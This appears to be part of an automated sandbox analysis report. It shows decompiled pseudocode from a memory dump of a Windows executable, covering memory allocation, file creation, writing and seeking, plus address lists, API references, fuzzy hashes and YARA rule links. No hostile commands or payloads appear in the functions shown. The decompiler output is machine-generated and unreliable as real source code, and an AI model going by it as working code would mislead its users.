				unsigned int _t53;
				void* _t59;
				void* _t64;
				signed int _t65;
				signed int* _t67;
				intOrPtr* _t69;
				void* _t74;

				_t53 = _a4;
				_t74 = __ecx;
				if(_t53 == 0) {
					E004062F7(0x432a6c);
				}
				_t37 = 0x40000;
				if(_t53 < 0x40000) {
					_t53 = 0x40000;
					_a4 = 0x40000;
				}
				if(_t53 >  *(_t74 + 0xe6f4)) {
					_t37 = _t53 >> 0x10;
					if(_t37 <= 0x10000) {
						if(_a8 == 0 ||  *(_t74 + 0x4b34) == 0 &&  *((char*)(_t74 + 0x4c38)) == 0) {
							L11:
							_a11 = 0;
							goto L12;
						} else {
							_a11 = 1;
							if( *((char*)(_t74 + 0x4c38)) == 0) {
								L12:
								_push(_t67);
								if( *((char*)(_t74 + 0x4c38)) == 0) {
									_t39 = E0041C86E(_t53, _t64, _t67, _t53); // executed
									_v8 = _t39;
									__eflags = _t39;
									if(__eflags != 0) {
										L20:
										if( *((char*)(_t74 + 0x4c38)) != 0) {
											L27:
											 *(_t74 + 0xe6f4) = _t53;
											 *((intOrPtr*)(_t74 + 0xe6f8)) = _t53 - 1;
											return _t39;
										}
										E0041A110(_t67, _v8, 0, _t53);
										if(_a11 == 0) {
											L24:
											_t69 = _t74 + 0x4b34;
											_t41 =  *_t69;
											_t94 = _t41;
											if(_t41 != 0) {
												_push(_t41);
												E00419DFE(_t53, _t69, _t74, _t94);
											}
											_t39 = _v8;
											 *_t69 = _t39;
											goto L27;
										}
										_t59 = 1;
										if( *(_t74 + 0xe6f4) <= 1) {
											goto L24;
										} else {
											goto L23;
										}
										do {
											L23:
											_t44 =  *((intOrPtr*)(_t74 + 0x70)) - _t59;
											_t65 = _t53 - 1;
											_t53 = _a4;
											_t59 = _t59 + 1;
											 *((char*)((_t65 & _t44) + _v8)) =  *((intOrPtr*)(( *(_t74 + 0xe6f4) - 0x00000001 & _t44) +  *(_t74 + 0x4b34)));
										} while (_t59 <  *(_t74 + 0xe6f4));
										goto L24;
									}
									L15:
									if(_a11 != 0 || _t53 < 0x1000000) {
										goto L10;
									} else {
										_t67 = _t74 + 0x4b34;
										_t50 =  *_t67;
										_t88 = _t50;
										if(_t50 != 0) {
											_push(_t50);
											E00419DFE(_t53, _t67, _t74, _t88);
											 *_t67 =  *_t67 & 0x00000000;
										}
										_t39 = E0041207F(_t74 + 0x4b38, _t53);
										 *((char*)(_t74 + 0x4c38)) = 1;
										goto L20;
									}
								}
								_v8 = _v8 & 0x00000000;
								goto L15;
							}
							L10:
							E00411C9C( &_v20);
							E0041C1ED( &_v20, 0x42d4c4);
							goto L11;
						}
					}
				}
				return _t37;
			}

0x00412229
0x0041222d
0x00412231
0x00412238
0x00412238
0x0041223d
0x00412244
0x00412246
0x00412248
0x00412248
0x00412251
0x00412259
0x00412261
0x0041226b
0x004122a2
0x004122a2
0x00000000
0x0041227f
0x00412286
0x0041228a
0x004122a6
0x004122ad
0x004122ae
0x004122b7
0x004122bd
0x004122c0
0x004122c2
0x004122fb
0x00412302
0x00412369
0x00412369
0x00412370
0x00000000
0x00412376
0x0041230a
0x00412316
0x00412351
0x00412351
0x00412357
0x00412359
0x0041235b
0x0041235d
0x0041235e
0x00412363
0x00412364
0x00412367
0x00000000
0x00412367
0x0041231a
0x00412321
0x00000000
0x00000000
0x00000000
0x00000000
0x00412323
0x00412323
0x0041232c
0x00412331
0x00412334
0x00412345
0x00412346
0x00412349
0x00000000
0x00412323
0x004122c4
0x004122c8
0x00000000
0x004122d2
0x004122d2
0x004122d8
0x004122da
0x004122dc
0x004122de
0x004122df
0x004122e4
0x004122e7
0x004122ef
0x004122f4
0x00000000
0x004122f4
0x004122c8
0x004122b0
0x00000000
0x004122b0
0x0041228c
0x0041228f
0x0041229d
0x00000000
0x0041229d
0x0041226b
0x00412261
0x0041237a

APIs

__CxxThrowException@8.LIBCMT ref: 0041229D
_malloc.LIBCMT ref: 004122B7

Part of subcall function 0041C86E: __FF_MSGBANNER.LIBCMT ref: 0041C891
Part of subcall function 0041C86E: __NMSG_WRITE.LIBCMT ref: 0041C898
Part of subcall function 0041C86E: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004208E4,00000000,00000001,00000000,?,0041E92D,00000018,0042D8F0,0000000C,0041E9BE), ref: 0041C8E5

_memset.LIBCMT ref: 0041230A

Strings

l*C, xrefs: 00412233

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateException@8HeapThrow_malloc_memset
String ID: l*C
API String ID: 3965744532-1043478356
Opcode ID: d1f13b17ce4e6704f5f86e257bac9e3f2a785c0788edb0549fd624660201ed4d
Instruction ID: 0bd812d0470566043050083864933ba7faed5101c1c69455d560a7bea6fd55d5
Opcode Fuzzy Hash: d1f13b17ce4e6704f5f86e257bac9e3f2a785c0788edb0549fd624660201ed4d
Instruction Fuzzy Hash: 834102B0901745ABDB25EE78D6C47DEB7D4AF11304F14086FE9A9D3242CBB8AAD0C719

Uniqueness

Uniqueness Score: -1.00%

Function 00408835, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00408835(intOrPtr* __ecx, void* __edx, void* _a4, long _a8) {
				long _v8;
				void* _t26;
				int _t28;
				long _t34;
				int _t37;
				void* _t40;
				struct _OVERLAPPED* _t43;
				long _t49;
				void* _t54;
				void* _t58;
				intOrPtr _t59;
				intOrPtr* _t61;

				_t54 = __edx;
				_push(__ecx);
				_t43 = 0;
				_t61 = __ecx;
				if(_a8 == 0) {
					L21:
					return _t26;
				}
				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
					_t26 = GetStdHandle(0xfffffff5);
					 *(_t61 + 4) = _t26;
				}
				while(1) {
					_v8 = _t43;
					if( *((intOrPtr*)(_t61 + 0xc)) == _t43) {
						goto L11;
					}
					_t58 = 0;
					if(_a8 <= _t43) {
						L13:
						if( *((intOrPtr*)(_t61 + 0x14)) == _t43 ||  *((intOrPtr*)(_t61 + 0xc)) != _t43) {
							L20:
							 *((char*)(_t61 + 8)) = 1;
							goto L21;
						} else {
							_push(_t43);
							if(E0040629E(0x432a6c, _t61 + 0x1e) == 0) {
								_t26 = E0040641C(0x432a6c, _t43, _t61 + 0x1e);
								goto L20;
							}
							_t26 = _v8;
							if(_t26 < _a8 && _t26 > _t43) {
								_t59 =  *_t61;
								_t40 =  *((intOrPtr*)(_t59 + 0x10))(_t43);
								_t43 = 0;
								asm("sbb edx, ebx");
								_t26 =  *((intOrPtr*)(_t59 + 0xc))(_t40 - _v8, _t54);
							}
							continue;
						}
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t49 = _a8 - _t58;
						_t34 = 0x4000;
						if(_t49 < 0x4000) {
							_t34 = _t49;
						}
						_t37 = WriteFile( *(_t61 + 4), _a4 + _t58, _t34,  &_v8, _t43);
						asm("sbb al, al");
						_t26 =  ~(_t37 - 1) + 1;
						if(_t26 == 0) {
							goto L13;
						}
						_t58 = _t58 + 0x4000;
						if(_t58 < _a8) {
							continue;
						}
						L12:
						if(_t26 != _t43) {
							goto L20;
						}
						goto L13;
					}
					goto L13;
					L11:
					_t28 = WriteFile( *(_t61 + 4), _a4, _a8,  &_v8, _t43); // executed
					asm("sbb al, al");
					_t26 =  ~(_t28 - 1) + 1;
					goto L12;
				}
			}

0x00408835
0x00408838
0x0040883a
0x0040883d
0x00408842
0x00408924
0x00408927
0x00408927
0x0040884c
0x00408850
0x00408856
0x00408856
0x0040885a
0x0040885a
0x00408860
0x00000000
0x00000000
0x00408862
0x00408867
0x004088c3
0x004088c6
0x0040891f
0x0040891f
0x00000000
0x004088cd
0x004088cd
0x004088e0
0x0040891a
0x00000000
0x0040891a
0x004088e2
0x004088e8
0x004088f6
0x004088fb
0x00408901
0x00408905
0x0040890b
0x0040890b
0x00000000
0x004088e8
0x00000000
0x00000000
0x00000000
0x00408869
0x00408869
0x0040886c
0x0040886e
0x00408875
0x00408877
0x00408877
0x00408888
0x00408891
0x00408893
0x00408895
0x00000000
0x00000000
0x00408897
0x004088a0
0x00000000
0x00000000
0x004088bf
0x004088c1
0x00000000
0x00000000
0x00000000
0x004088c1
0x00000000
0x004088a4
0x004088b2
0x004088bb
0x004088bd
0x00000000
0x004088bd

APIs

GetStdHandle.KERNEL32(000000F5), ref: 00408850
WriteFile.KERNEL32(?,?,00004000,?,00000000), ref: 00408888
WriteFile.KERNELBASE(?,?,00000001,?,00000000), ref: 004088B2

Strings

l*C, xrefs: 004088D1

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite$Handle
String ID: l*C
API String ID: 4209713984-1043478356
Opcode ID: ec20ea27b31a8a1113be6d5137646f3cc7e9fbb89834a9d340bcd6673d00e30a
Instruction ID: ae865d6f190247a9f834d309b3ca334d0cfe91cd3d5f1019df359b8c21b12273
Opcode Fuzzy Hash: ec20ea27b31a8a1113be6d5137646f3cc7e9fbb89834a9d340bcd6673d00e30a
Instruction Fuzzy Hash: EF318172600108AFDF24AF65CA8497E77A9EB90310744C53FE596A7280DB38AE45CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0040892A, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040892A(void* __ecx, signed int __edx) {
				long _v8;
				long _t10;
				signed int _t13;
				signed int _t26;
				long _t29;
				void* _t32;

				_push(__ecx);
				_t32 = __ecx;
				_t26 = __edx | 0xffffffff;
				if( *((intOrPtr*)(__ecx + 4)) != _t26) {
					L3:
					_v8 = 0;
					_t10 = SetFilePointer( *(_t32 + 4), 0,  &_v8, 1); // executed
					_t29 = _t10;
					if(_t29 != 0xffffffff || GetLastError() == 0) {
						L7:
						asm("cdq");
						_t13 = E0041A4C0(_v8, _t26, 0, 1) + _t29;
						asm("adc edx, ecx");
					} else {
						if( *((intOrPtr*)(_t32 + 0x14)) == 0) {
							_t13 = _t26 | 0xffffffff;
						} else {
							E0040632B(0x432a6c, _t32 + 0x1e);
							goto L7;
						}
					}
				} else {
					if( *((intOrPtr*)(__ecx + 0x14)) == 0) {
						_t13 = _t26;
					} else {
						E0040632B(0x432a6c, __ecx + 0x1e);
						goto L3;
					}
				}
				return _t13;
			}

0x0040892d
0x00408930
0x00408932
0x0040893a
0x0040894f
0x0040895a
0x0040895d
0x00408963
0x00408968
0x00408987
0x0040898c
0x00408997
0x00408999
0x00408974
0x00408977
0x004089a7
0x00408979
0x00408982
0x00000000
0x00408982
0x00408977
0x0040893c
0x0040893f
0x004089a0
0x00408941
0x0040894a
0x00000000
0x0040894a
0x0040893f
0x0040899f

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001), ref: 0040895D
GetLastError.KERNEL32(?,?), ref: 0040896A

Strings

l*C, xrefs: 00408945
l*C, xrefs: 0040897D

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastPointer
String ID: l*C$l*C
API String ID: 2976181284-2252155657
Opcode ID: 35a7470e3237bb13660cc912f33129a0efe207e380628f92ba94e2c13f87b7e8
Instruction ID: b6682577c36e40ea43246553f67d192f292e6ee0ce8f908a3be2f604c2b9c531
Opcode Fuzzy Hash: 35a7470e3237bb13660cc912f33129a0efe207e380628f92ba94e2c13f87b7e8
Instruction Fuzzy Hash: 7401F9B1701204BFE720B7A95E459BB769ECB84334758423FB952D32C0DE789D01426B

Uniqueness

Uniqueness Score: -1.00%

Function 0040DFC4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040DFC4(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _t20;
				void* _t25;
				void* _t39;
				void* _t45;
				intOrPtr _t47;

				_t39 = __edx;
				E00419DD4(E004292CF, _t45);
				_push(__ecx);
				E0041A3E0(0x5c00);
				 *((intOrPtr*)(_t45 - 0x10)) = _t47;
				E0041A0EF(0x44a0ea, "X");
				E004108FF(0x44c10c, 0x42a538);
				E0041A0EF(0x44b10a,  *((intOrPtr*)(_t45 + 0xc)));
				E00405321(0x442e38,  *((intOrPtr*)(_t45 + 0xc)));
				_t4 = _t45 - 4;
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				_t20 = 4;
				 *0x4490cc = _t20;
				 *0x4490c8 = _t20;
				 *0x4490c4 = _t20;
				 *0x447f87 =  *0x440cdd;
				_push(0x442e38);
				 *0x447fc0 = 1;
				 *0x447f88 =  *0x440cdc;
				E00406F15(_t45 - 0x5c10, _t39,  *_t4);
				 *(_t45 - 4) = 1;
				E004080F3(_t45 - 0x5c10, _t39,  *_t4); // executed
				 *(_t45 - 4) = 0;
				_t25 = E00406E0C(_t45 - 0x5c10); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t25;
			}

0x0040dfc4
0x0040dfc9
0x0040dfce
0x0040dfd4
0x0040dfdc
0x0040dfe9
0x0040dffa
0x0040e007
0x0040e018
0x0040e01d
0x0040e01d
0x0040e023
0x0040e024
0x0040e029
0x0040e02e
0x0040e038
0x0040e042
0x0040e049
0x0040e050
0x0040e055
0x0040e060
0x0040e064
0x0040e06f
0x0040e073
0x0040e07d
0x0040e086

APIs

__EH_prolog.LIBCMT ref: 0040DFC9
_wcscpy.LIBCMT ref: 0040DFE9

Part of subcall function 004108FF: _wcslen.LIBCMT ref: 00410915
Part of subcall function 004108FF: _wcscpy.LIBCMT ref: 0041092B

_wcscpy.LIBCMT ref: 0040E007

Part of subcall function 00406F15: __EH_prolog.LIBCMT ref: 00406F1A

Part of subcall function 004080F3: __EH_prolog.LIBCMT ref: 004080F8

Part of subcall function 00406E0C: __EH_prolog.LIBCMT ref: 00406E11

Strings

8.D, xrefs: 0040E011

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog$_wcscpy$_wcslen
String ID: 8.D
API String ID: 1734755022-2945442207
Opcode ID: 7b5e93a2f3ec7632ced680e48e53d8164e98444475671eee89faae05fa9347b8
Instruction ID: 7676a1a889bf31618eb5193624bf3d43046a050a1cb9a2c346de2d531f0ccc1c
Opcode Fuzzy Hash: 7b5e93a2f3ec7632ced680e48e53d8164e98444475671eee89faae05fa9347b8
Instruction Fuzzy Hash: FD11C475605650AFE704EB65EC42BCD7BA0EB16315F5040AFE404622C3DB7809859B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00419757, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419757(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				long _t8;
				WCHAR* _t10;

				_t8 = _a4;
				_t5 = GetClassNameW(_t8,  &_v164, 0x50);
				if(_t5 != 0) {
					_t10 = L"EDIT";
					_t5 = E004119A6( &_v164, _t10);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t8, 0, _t10, 0); // executed
						_t8 = _t5;
					}
				}
				if(_t8 != 0) {
					_t6 = SHAutoComplete(_t8, 0x10); // executed
					return _t6;
				}
				return _t5;
			}

0x00419761
0x0041976e
0x00419776
0x00419779
0x00419786
0x0041978d
0x00419795
0x0041979b
0x0041979b
0x0041979d
0x004197a0
0x004197a5
0x00000000
0x004197a5
0x004197ad

APIs

GetClassNameW.USER32 ref: 0041976E
SHAutoComplete.SHLWAPI(?,00000010), ref: 004197A5

Part of subcall function 004119A6: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,00000000,000000FF,004099A9,?,00000000,?,00409AC3,00000000,-00000002,?,00000000,?), ref: 004119BC

FindWindowExW.USER32 ref: 00419795

Strings

EDIT, xrefs: 00419779, 0041977E, 00419791

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 610b477385a7f65be559d9ea8d4bb354b77f27ba6d22cbd1794cef8c1a471651
Instruction ID: d81611e3cd431550fa51b66d2ad59cb3786ea788f2d6094fabf0b13de604d7f5
Opcode Fuzzy Hash: 610b477385a7f65be559d9ea8d4bb354b77f27ba6d22cbd1794cef8c1a471651
Instruction Fuzzy Hash: 4CF08932700218ABE73156659C45FFB776C9F86B50F440066BE14E22C4D769E941C5BE

Uniqueness

Uniqueness Score: -1.00%

Function 0040185E, Relevance: 6.1, APIs: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040185E(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __ebx;
				signed int _t69;
				signed int _t70;
				intOrPtr _t71;
				intOrPtr _t81;
				intOrPtr _t92;
				void* _t93;
				intOrPtr _t96;
				void* _t98;
				void* _t103;

				_t103 = __eflags;
				_t94 = __edi;
				_t93 = __edx;
				E00419DD4(E00429085, _t98);
				_push(__ecx);
				_t96 = __ecx;
				 *((intOrPtr*)(_t98 - 0x10)) = __ecx;
				E00408533(__ecx);
				 *((intOrPtr*)(_t98 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x42a448;
				E00405ED9(__ecx + 0x1024, _t103);
				 *((char*)(_t98 - 4)) = 1;
				E0040B5A4(__ecx + 0x1c30, _t103);
				 *((intOrPtr*)(__ecx + 0x5718)) = 0;
				 *((intOrPtr*)(__ecx + 0x571c)) = 0;
				E00401432(__ecx + 0x57c8);
				_t69 = E00401432(__ecx + 0x7b08);
				 *((char*)(_t98 - 4)) = 4;
				_t70 = _t69 & 0xffffff00 |  *((intOrPtr*)(_t98 + 8)) == 0x00000000;
				 *((intOrPtr*)(__ecx + 0x5704)) = 0;
				 *(__ecx + 0x5700) = _t70;
				_t105 = _t70;
				if(_t70 == 0) {
					_t71 =  *((intOrPtr*)(_t98 + 8));
				} else {
					_push(0x72a8); // executed
					_t81 = E0041A18A(0, _t93, __edi, _t105); // executed
					_t92 = _t81;
					 *((intOrPtr*)(_t98 + 8)) = _t92;
					 *((char*)(_t98 - 4)) = 5;
					if(_t92 == 0) {
						_t71 = 0;
					} else {
						_t71 = E00409D27(_t92, __edi); // executed
					}
				}
				 *((intOrPtr*)(_t96 + 0x5704)) = _t71;
				 *(_t96 + 0x5708) =  *(_t96 + 0x5708) | 0xffffffff;
				 *(_t96 + 0x570c) =  *(_t96 + 0x570c) | 0xffffffff;
				 *(_t96 + 0x5710) =  *(_t96 + 0x5710) | 0xffffffff;
				 *((char*)(_t96 + 0x1c)) =  *((intOrPtr*)(_t71 + 0x5195));
				 *((intOrPtr*)(_t96 + 0xa230)) = 2;
				 *((char*)(_t96 + 0xa234)) = 0;
				 *((char*)(_t96 + 0xa235)) = 0;
				 *((char*)(_t96 + 0xa236)) = 0;
				 *((char*)(_t96 + 0xa237)) = 0;
				 *((char*)(_t96 + 0xa238)) = 0;
				 *((char*)(_t96 + 0xa239)) = 0;
				 *((char*)(_t96 + 0xa23a)) = 0;
				 *((intOrPtr*)(_t96 + 0xa240)) = 0;
				 *((intOrPtr*)(_t96 + 0x5718)) = 0;
				 *((intOrPtr*)(_t96 + 0x571c)) = 0;
				 *((char*)(_t96 + 0xa23b)) = 0;
				 *((char*)(_t96 + 0xa23c)) = 0;
				 *((char*)(_t96 + 0xa245)) = 0;
				 *((char*)(_t96 + 0xa244)) = 0;
				 *((intOrPtr*)(_t96 + 0x5720)) = 0;
				 *((intOrPtr*)(_t96 + 0xa220)) = 0;
				 *((intOrPtr*)(_t96 + 0xa224)) = 0;
				 *((intOrPtr*)(_t96 + 0xa228)) = 0;
				 *((intOrPtr*)(_t96 + 0xa22c)) = 0;
				E0041A110(_t94, _t96 + 0x5750, 0, 0x40);
				E0041A110(_t94, _t96 + 0x5790, 0, 0x34);
				E0041A110(_t94, _t96 + 0x7ac8, 0, 0x20);
				 *((short*)(_t96 + 0xa27a)) = 0;
				 *((intOrPtr*)(_t96 + 0xa258)) = 0;
				 *((intOrPtr*)(_t96 + 0xa260)) = 0;
				 *((intOrPtr*)(_t96 + 0xa264)) = 0;
				 *((intOrPtr*)(_t96 + 0xa268)) = 0;
				 *((intOrPtr*)(_t96 + 0xa26c)) = 0;
				 *((intOrPtr*)(_t96 + 0xa270)) = 0;
				 *((intOrPtr*)(_t96 + 0xa274)) = 0;
				 *((char*)(_t96 + 0xa256)) = 0;
				 *((char*)(_t96 + 0xa278)) = 0;
				 *((char*)(_t96 + 0x5728)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
				return _t96;
			}

0x0040185e
0x0040185e
0x0040185e
0x00401863
0x00401868
0x0040186b
0x0040186d
0x00401870
0x0040187d
0x00401880
0x00401886
0x00401891
0x00401895
0x004018a0
0x004018a6
0x004018ac
0x004018b7
0x004018bf
0x004018c3
0x004018c6
0x004018cc
0x004018d2
0x004018d4
0x004018f9
0x004018d6
0x004018d6
0x004018db
0x004018e1
0x004018e3
0x004018e6
0x004018ec
0x004018f5
0x004018ee
0x004018ee
0x004018ee
0x004018ec
0x004018fc
0x00401908
0x0040190f
0x00401916
0x0040191f
0x0040192a
0x00401934
0x0040193a
0x00401940
0x00401946
0x0040194c
0x00401952
0x00401958
0x0040195e
0x00401964
0x0040196a
0x00401970
0x00401976
0x0040197c
0x00401982
0x00401988
0x0040198e
0x00401994
0x0040199a
0x004019a0
0x004019a6
0x004019b5
0x004019c4
0x004019d1
0x004019d8
0x004019de
0x004019e4
0x004019ea
0x004019f0
0x004019f6
0x004019fc
0x00401a02
0x00401a08
0x00401a0e
0x00401a18
0x00401a20

APIs

__EH_prolog.LIBCMT ref: 00401863

Part of subcall function 00405ED9: __EH_prolog.LIBCMT ref: 00405EDE
Part of subcall function 00405ED9: _memset.LIBCMT ref: 00405F1F
Part of subcall function 00405ED9: _memset.LIBCMT ref: 00405F37

Part of subcall function 0040B5A4: __EH_prolog.LIBCMT ref: 0040B5A9

_memset.LIBCMT ref: 004019A6
_memset.LIBCMT ref: 004019B5
_memset.LIBCMT ref: 004019C4

Part of subcall function 0041A18A: _malloc.LIBCMT ref: 0041A1A4

Part of subcall function 00409D27: __EH_prolog.LIBCMT ref: 00409D2C

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset$H_prolog$_malloc
String ID:
API String ID: 4233843809-0
Opcode ID: 0ca41cbab28b6cb23440656d544f2c5b9cb7f505d7496efa7994623d2bce40ef
Instruction ID: f9dcf17328606f18f0086fa5fa7630afd9f726c1e8e5834ee7477fccc96b39ec
Opcode Fuzzy Hash: 0ca41cbab28b6cb23440656d544f2c5b9cb7f505d7496efa7994623d2bce40ef
Instruction Fuzzy Hash: 80511971A49B80DAC721DF7D98915C7BBE4BF1A310F84497ED1EE93282C3392644DB1A

Uniqueness

Uniqueness Score: -1.00%

Function 00408570, Relevance: 6.1, APIs: 4, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00408570(void* __ecx, long _a4, long _a8, short _a12, WCHAR* _a4112, signed char _a4116) {
				long _v0;
				long _t35;
				long _t39;
				void* _t40;
				long _t48;
				signed int _t49;
				signed int _t50;
				signed char _t52;
				intOrPtr _t53;
				long _t61;
				void* _t63;
				void* _t66;

				E0041A3E0(0x100c);
				_t63 = __ecx;
				_t52 = _a4116;
				 *((intOrPtr*)(__ecx + 0x1020)) = 0;
				if( *((char*)(__ecx + 0x1c)) != 0 || (_t52 & 0x00000004) != 0) {
					_t35 = 1;
				} else {
					_t35 = 0;
				}
				asm("sbb edi, edi");
				_t61 = ( ~(_t52 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
				if((_t52 & 0x00000001) != 0) {
					_t61 = _t61 | 0x40000000;
				}
				_v0 = 1;
				if(_t35 != 0) {
					_v0 = 3;
				}
				_t49 = CreateFileW;
				_t39 = (0 |  *((intOrPtr*)(_t63 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
				_a4 = _t39;
				_t40 = CreateFileW(_a4112, _t61, _v0, 0, 3, _t39, 0); // executed
				_t66 = _t40;
				if(_t66 != 0xffffffff) {
					L15:
					 *(_t63 + 0xc) =  *(_t63 + 0xc) & 0x00000000;
					_t50 = _t49 & 0xffffff00 | _t66 != 0xffffffff;
					 *((char*)(_t63 + 0x12)) = 0;
					 *((char*)(_t63 + 0x10)) = 0;
					if(_t50 != 0) {
						 *(_t63 + 4) = _t66;
						E0041078F(_t63 + 0x1e, _a4112, 0x800);
					}
					return _t50;
				} else {
					_a8 = GetLastError();
					if(E0040A582(_a4112,  &_a12, 0x800) == 0) {
						L13:
						if(_a8 == 2) {
							 *((intOrPtr*)(_t63 + 0x1020)) = 1;
						}
						goto L15;
					}
					_t66 = CreateFileW( &_a12, _t61, _v0, 0, 3, _a4, 0);
					_t48 = GetLastError();
					_t53 = 2;
					if(_t48 == _t53) {
						_a8 = _t53;
					}
					if(_t66 != 0xffffffff) {
						goto L15;
					} else {
						goto L13;
					}
				}
			}

0x00408575
0x0040857d
0x0040857f
0x0040858d
0x00408593
0x0040859e
0x0040859a
0x0040859a
0x0040859a
0x004085ac
0x004085b4
0x004085bd
0x004085bf
0x004085bf
0x004085c5
0x004085cf
0x004085d1
0x004085d1
0x004085de
0x004085e9
0x004085f6
0x00408602
0x00408604
0x00408609
0x0040866e
0x0040866e
0x00408675
0x00408678
0x0040867c
0x00408682
0x00408690
0x00408697
0x00408697
0x004086a8
0x0040860b
0x00408611
0x0040862d
0x0040865d
0x00408662
0x00408664
0x00408664
0x00000000
0x00408662
0x00408645
0x00408647
0x0040864f
0x00408652
0x00408654
0x00408654
0x0040865b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040865b

APIs

CreateFileW.KERNELBASE(?,-80000000,00000004,00000000,00000003,-00000001,00000000,00000000,?,?,00000000,0040B95D,?,00000004,00000000,00432A7C), ref: 00408602
GetLastError.KERNEL32(?,?,00000000,0040B95D,?,00000004,00000000,00432A7C,0040C051), ref: 0040860B
CreateFileW.KERNEL32(?,-80000000,00000004,00000000,00000003,00432A7C,00000000,?,00000004,00000800,?,?,00000000,0040B95D,?,00000004), ref: 00408643
GetLastError.KERNEL32(?,?,00000000,0040B95D,?,00000004,00000000,00432A7C,0040C051), ref: 00408647

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: a0c28653848cc748aed6cfd033e371f98b9c1ce84e506aa3f37025ad23994853
Instruction ID: d3244d38933cfd72501681ccf56228fae116f8fd4ae423078c94564a47ef4dfc
